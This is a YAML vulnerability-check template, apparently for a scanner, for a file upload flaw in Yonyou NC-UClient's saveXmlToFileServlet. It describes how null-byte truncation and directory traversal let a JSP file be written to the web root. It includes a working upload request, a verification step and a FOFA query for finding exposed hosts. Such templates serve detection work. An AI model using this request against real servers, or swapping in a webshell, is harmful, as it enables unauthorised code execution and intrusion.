product: 用友NC-UClient
vName: 用友NC-UClient saveXmlToFIleServlet文件上传
type: 文件上传
vID: [ ]
level: 3
vDesc: 用友NClient接口saveXmlToFIleServlet存在文件上传漏洞，/portal/pt/servlet/saveXmlToFileServlet/doPost接口会保存xml文档到服务器一个路径下，默认会添加.xml后缀，通过Windows的文件名特性可截断.xml文件后缀。再通过目录穿越可上传jsp文件到nc_web目录下。
version: 用友NC 65
note: ''
search:
  FOFA: app="用友-UFIDA-NC" && icon_hash="1085941792"
protocol: http
link: https://download.csdn.net/blog/column/12593339/137506800
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /portal/pt/servlet/saveXmlToFileServlet/doPost?pageId=login&filename=52e039302a62d077.jsp%00
      header:
        Content-Type: application/octet-stream
      data: 95cc64dd2825f9df13ec4ad683ecf339
    verify:
      path: /portal/processxml/52e039302a62d077.jsp
      logic: and
      check:
        - status: 200
          body:
            value:
              - 95cc64dd2825f9df13ec4ad683ecf339
            logic: and